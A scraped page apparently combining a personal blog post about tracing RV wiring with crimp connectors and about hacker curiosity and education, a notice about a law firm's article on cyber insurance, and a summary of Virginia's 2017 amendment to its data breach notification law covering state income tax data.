Visit http://hacknaked.tv to get all the latest episodes!

Doing it wrong, or “us and them”

I was arguing with the wiring in a little RV over the weekend and it was the typical RV  mix of automotive wiring, household wiring, and What The Expletive wiring. I fell back to my auto mechanic days and set about chasing the demons through the wires. Basic diagnostics: separate, isolate, test, reconnect, retest, repeat, until a path becomes clear. In this quest I used an old trick of mine (although I assume many other have used it) in using crimp connectors the “wrong” way. This made me think of being called out for it many years ago, “you’re doing it wrong you idiot!” or something like that. I tried  to explain that I was just using the common butt connectors in a different way for a different situation, but he wouldn’t hear of it. “That’s not how you use them” was the answer.

This was long before my computer and hacker days, but the mindset is there in many car guys. “You’re not supposed to do that” is a warning to most, but an invitation to many of us.

I hate to say we can’t teach that, but with a lot of folks you either have that curiosity or you don’t. I do think a lot more folks have that kind of innate curiosity and desire to test boundaries, but sadly our modern education systems can’t handle those characteristics in kids- “do it our way or you are wrong” is great for standardized testing, but terrible for education. And in our little world of cyberthings we really need curious people, people who ask questions like

Why?

Why not?

What if?

Hold my beer…

OK, the last wasn’t a question, but a statement of willingness to try.

I don’t have the answer, but I have seen a lot of little things which help- hackerspaces, makerspaces, good STEM/STEAM programs, and youth programs at hacker/security cons are great steps, but I fear that these only serve to minimize the damage done by the state of education in the US lately.

So yeah, I guess I’m just complaining. Again.

Oh, and about using the connectors wrong, normally you put one stripped end of a wire in each end of the connector and create an inline splice. For problem situations I connect wires as shown in the image. This provides a good connection, arguably better than the inline method since the wires are directly touching, but more importantly the open ends of the connectors are shielded to prevent accidental contact, but open to provide handy test points as you chase the demons through the wires. Which reminds me of another story, but that’s one for the barstool…

Wrong

Jack

Hunton Discusses Critical Cyber Coverage Selection Issues

In March 2017, Syed Ahmad, a partner with Hunton & Williams LLP’s insurance practice, and Eileen Garczynski, partner at insurance brokerage Ames & Gough, co-authored an article, Protecting Company Assets with Cyber Liability Insurance, in Mealey’s Data Privacy Law Report. The article describes why cyber liability insurance is necessary for companies and provides tips on how it can make a big difference. Ahmad and Garczynski discuss critical questions companies seeking to protect company assets through cyber insurance should be asking.

Read the full article.

Virginia Adds State Income Tax Provision to Data Breach Notification Law

Recently, Virginia passed an amendment to its data breach notification law that adds state income tax information to the types of data that require notification to the Virginia Office of the Attorney General in the event of unauthorized access and acquisition of such data. Under the amended law, an employer or payroll service provider must notify the Virginia Office of the Attorney General after the discovery or notification of unauthorized access and acquisition of unencrypted and unredacted computerized data containing a Virginia resident’s taxpayer identification number in combination with the income tax withheld for that taxpayer. 

The amendment contains a harm threshold, requiring notification when such unauthorized access and acquisition compromises the confidentiality of the data and causes, or reasonably will cause, identity theft or fraud. For employers, the amendment applies only to the employer’s Virginia employees, and not to information regarding the employer’s customers or non-employees. Notification to the Virginia Office of the Attorney General must be made “without unreasonable delay” and must include the name and federal employer identification number of the employer that may be affected by the incident. The amendment requires notification only to the Virginia Office of the Attorney General, and not affected individuals. The amendment takes effect on July 1, 2017.